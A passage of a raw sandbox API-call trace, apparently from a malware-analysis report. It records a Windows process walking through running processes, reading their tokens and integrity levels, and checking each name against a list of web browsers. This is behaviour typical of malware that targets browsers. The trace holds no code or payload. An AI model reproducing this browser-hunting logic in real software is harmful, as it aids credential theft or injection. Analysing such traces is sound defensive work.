ReturnLength=0x4bfd20) returned 1 [0218.247] CloseHandle (hObject=0xb8) returned 1 [0218.247] CloseHandle (hObject=0xb4) returned 1 [0218.247] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0218.247] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167b08, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.247] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.247] GetLastError () returned 0x7a [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.247] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.247] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.247] CloseHandle (hObject=0xb8) returned 1 [0218.247] CloseHandle (hObject=0xb4) returned 1 [0218.247] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.247] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.247] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.247] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.247] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.247] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0218.247] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.247] GetLastError () returned 0x7a [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.247] CloseHandle (hObject=0xb8) returned 1 [0218.247] CloseHandle (hObject=0xb4) returned 1 [0218.247] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0218.248] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167c78, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.248] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.248] GetLastError () returned 0x7a [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.248] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.248] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.248] CloseHandle (hObject=0xb8) returned 1 [0218.248] CloseHandle (hObject=0xb4) returned 1 [0218.248] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0218.248] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0218.248] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0218.248] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0218.248] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0218.248] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0218.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0218.248] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.248] GetLastError () returned 0x7a [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.248] CloseHandle (hObject=0xb8) returned 1 [0218.248] CloseHandle (hObject=0xb4) returned 1 [0218.248] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0218.248] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167df8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.248] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.248] GetLastError () returned 0x7a [0218.248] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.248] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.248] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.248] CloseHandle (hObject=0xb8) returned 1 [0218.248] CloseHandle (hObject=0xb4) returned 1 [0218.249] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0218.249] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0218.249] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0218.249] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0218.249] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0218.249] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0218.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0218.249] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.249] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.249] GetLastError () returned 0x7a [0218.249] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.249] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.249] CloseHandle (hObject=0xb8) returned 1 [0218.249] CloseHandle (hObject=0xb4) returned 1 [0218.249] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0218.249] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167f50, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.249] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.249] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.249] GetLastError () returned 0x7a [0218.249] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.249] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.249] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.249] CloseHandle (hObject=0xb8) returned 1 [0218.249] CloseHandle (hObject=0xb4) returned 1 [0218.249] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0218.249] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0218.249] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0218.249] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0218.249] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0218.249] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0218.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0218.250] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.250] GetLastError () returned 0x7a [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.250] CloseHandle (hObject=0xb8) returned 1 [0218.250] CloseHandle (hObject=0xb4) returned 1 [0218.250] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0218.250] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1680a0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.250] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.250] GetLastError () returned 0x7a [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.250] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.250] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.250] CloseHandle (hObject=0xb8) returned 1 [0218.250] CloseHandle (hObject=0xb4) returned 1 [0218.250] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0218.250] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0218.250] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0218.250] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0218.250] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0218.250] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0218.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0218.250] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.250] GetLastError () returned 0x7a [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.250] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.250] CloseHandle (hObject=0xb8) returned 1 [0218.250] CloseHandle (hObject=0xb4) returned 1 [0218.250] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0218.251] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1681f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.251] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.251] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.251] GetLastError () returned 0x7a [0218.251] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.251] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.251] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.251] CloseHandle (hObject=0xb8) returned 1 [0218.251] CloseHandle (hObject=0xb4) returned 1 [0218.251] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.251] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0218.251] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.251] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.251] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.251] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0218.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0218.251] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.251] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.251] GetLastError () returned 0x7a [0218.251] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.251] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.251] CloseHandle (hObject=0xb8) returned 1 [0218.251] CloseHandle (hObject=0xb4) returned 1 [0218.251] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0218.251] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168350, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.251] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.251] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.251] GetLastError () returned 0x7a [0218.252] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.252] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.252] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.252] CloseHandle (hObject=0xb8) returned 1 [0218.252] CloseHandle (hObject=0xb4) returned 1 [0218.252] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0218.252] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0218.252] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0218.252] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0218.252] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0218.252] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0218.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0218.252] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.252] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.252] GetLastError () returned 0x7a [0218.252] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.252] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.252] CloseHandle (hObject=0xb8) returned 1 [0218.252] CloseHandle (hObject=0xb4) returned 1 [0218.252] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0218.252] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1684c8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.252] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.252] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.252] GetLastError () returned 0x7a [0218.252] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, 